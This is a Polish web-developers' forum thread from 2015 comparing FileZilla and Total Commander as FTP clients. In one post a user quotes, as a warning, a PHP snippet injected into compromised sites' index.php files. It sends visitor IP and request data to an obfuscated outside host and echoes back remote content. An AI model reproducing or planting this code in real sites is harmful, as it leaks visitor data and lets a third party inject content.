D3eX Opublikowano 10 Września 2015 Udostępnij Opublikowano 10 Września 2015 Który program bardziej wam służy, który bardziej do was przemawia : filezilla vs total commander ? I jakie macie opinie na ich temat. Kto pyta, nie błądzi Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
ravau Opublikowano 10 Września 2015 Udostępnij Opublikowano 10 Września 2015 Fillezilla według mnie bezkonkurencyjny, do tego bezpieczny. W przeszłości z total commanderem były niezłe jaja, dolepiały się wirusy do plików itp. Od tamtego czasu nie trzymam zapisanych haseł w żadnym programie ftp Najlepszy portal branży gier liczbowych Lotto to: Wyniki Lotto NET Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kamilp7 Opublikowano 10 Września 2015 Udostępnij Opublikowano 10 Września 2015 Zdecydowanie filezilla, na początku używałem TC ale po przesiadce i ogarnięciu dodatkowych funkcji filezilla wygrywa. Jedynie co mi przydaje się w TC i dlatego czasami go używam to wyszukiwanie/przeszukiwanie plików Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
mindryl Opublikowano 10 Września 2015 Udostępnij Opublikowano 10 Września 2015 Zeby nie tworzyć nowego tematu - na nowej instalce filezilli mam problem z opcją drag and drop - na innym pc działa ok, ale nie pamietam już czy zastosowałem jakiś wpis do rejestru czy dodatek by to działało - dla win7. Ale także polecam filezille. Decaptcher | Proxy Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Mion Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Zobacz WinSCP HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Aleksiejs Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Ja korzystam z filezilli i winscp (filezilla nie chce mi współpracować z tunelowaniem wykonanym przez bitvise) Firia.pl - Blog pasjonatki wszystkiego co związane ze zdrowiem, odżywianiem oraz psychologią Każdy czasem potrzebuje pięknych życzeń i wierszyków na najróżniejsze okazje - https://zyczeniowo.pl/ Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
krzysiek_web Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Z podanych 2óch? Zdecydowanie filezilla, moim zdaniem wygodniejszy interfejs. Wdrożenia i modyfikacje sklepów PrestaShop - webKS.pl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
mcmagik Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 filezilla vs total commander dwa różne softy o tak naprawdę odmiennym zastosowaniu - jak to porównywać? jak wybrać lepszy? oceniamy tylko funkcję ftp w TC? W przeszłości z total commanderem były niezłe jaja, dolepiały się wirusy do plików itp jak się "kupowało u ruskich" za darmoszkę to nic w tym nadzwyczajnego oryginalny, nie crackowany TC jest równie bezpieczny jak cała reszta ja używam opłaconej, oryginalnej wersji TC - to nie tylko menedżer plików, ftp czy edytor - można go bardzo mocno rozbudować i ułatwić sobie życie no i lubię te dos'owe wspomnienie w postaci NC Panie Boże, chroń mnie przed debilami, bo rozmowa z nimi powoduje, że grzeszę pychą.. Były sobie świnki trzy - content, google oraz link | jestem uczulony na pierd*lenie głupot | idiot intruder aka internetowy poszukiwacz prawdy Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
cyber Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Każdy kto używa Filezilla lub Total Commandera niech sobie sprawdzi czy czasem w plikach PHP na serwerze nie ma podobnego kodu który lubi się doklejać do plików index.php, main.php, footer.php itp. if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $sUserAgen = ""; $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgen, 'google') == false)&&(strstr($sUserAgen, 'yahoo') == false)&&(strstr($sUserAgen, 'baidu') == false)&&(strstr($sUserAgen, 'msn') == false)&&(strstr($sUserAgen, 'opera') == false)&&(strstr($sUserAgen, 'chrome') == false)&&(strstr($sUserAgen, 'bing') == false)&&(strstr($sUserAgen, 'safari') == false)&&(strstr($sUserAgen, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent). '&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
MKucinski Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Tylko WinSCP Specjalista SEO Łódź Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
cyber Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 No właśnie WinSCp, wie ktoś dlaczego ten manager ftp bardzo wolno wysyła pliki na serwer? testowane na ok. 10 serwerach i na wszystkich tak samo. Mam 1MB upload na necie a w WinSCP wysyła pliki z prędkością 10 max 20 KB/s. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
myszak Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 Używam TC z sentymentu. Jak zrobić cydr z jabłek? Przepisy na nalewki domowe smaczne i zdrowe. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
jimmi Opublikowano 11 Września 2015 Udostępnij Opublikowano 11 Września 2015 2 różne programy. do ftp filezilla była by fajna gdyby można byłą ją obsługiwać z klawiatury, tak jak TC. Przyjaźń psa na całe życie. ZAGINĄŁ DOM Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Eldoka Opublikowano 22 Września 2015 Udostępnij Opublikowano 22 Września 2015 Total Commander po aktualizacji ma hashowanie haseł i dla bezpieczeństwa ustawcie hasło główne oraz szyfrowane połączenie. Stary TC zapisywał hasła do pliku tekstowego w czystej postaci i stąd były te problemy z dolepianiem js, ale obecnie większym problemem są wordpressy i dziury w nich. forum zdrowotne - dodaj ogłoszenie za darmo! naprawiasz elektronikę? - dodaj ogłoszenie za darmo! masz kwiaciarnię? - dodaj ogłoszenie za darmo! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
hostit Opublikowano 22 Września 2015 Udostępnij Opublikowano 22 Września 2015 Każdy kto używa Filezilla lub Total Commandera niech sobie sprawdzi czy czasem w plikach PHP na serwerze nie ma podobnego kodu który lubi się doklejać do plików index.php, main.php, footer.php itp. @cyber, to nie wina Total Commander (skądinąd kapitalny program) czy Filezilla - tylko włamu na Twój serwer: https://hostit.pl/blog/385,moj-wordpress-zostal-zhackowany.html https://hostit.pl serwery, domeny, certyfikaty ssl Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Zarchiwizowany
Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.